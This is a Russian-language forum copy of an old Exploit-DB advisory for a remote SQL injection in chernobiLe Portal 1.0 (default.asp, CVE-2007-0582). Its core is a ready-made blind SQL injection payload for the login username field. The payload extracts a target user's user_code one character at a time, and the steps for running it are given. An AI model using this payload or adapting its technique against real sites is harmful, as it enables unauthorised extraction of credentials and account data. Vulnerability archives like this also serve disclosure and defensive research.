- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3210
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2007-0582
- Дата публикации
- 2007-01-27
Код:
*******************************************************************************
# Title : chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$ : Not Free,Private
# Info : /*
Turk Script Eklememen konusunda guzelce uyarmistim,ukalaca tamam demistin
Fakat hala birsey bulmus gibi bazi sitelerde bu raporlarin basligini
aciyorsun.Urastigin konuda bari acik birakma.Havani atmaya dvm et.
*\
*******************************************************************************
[[SQL]]]
http://[target]/[path]//default.asp (POST Method) [SQL]
Example:
Method: One Char Brute Force Technique
First,Please Register Before:
User:[username]'/**/and/**/(substring((SELECT/**/user_code/**/FROM/**/tblAuthor/**/WHERE/**/username='targetuser'),1,1))='A'/*
Pass:[userpass]
If Login True Then First Character = A
elSe Continue...
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-27]- Источник
- www.exploit-db.com
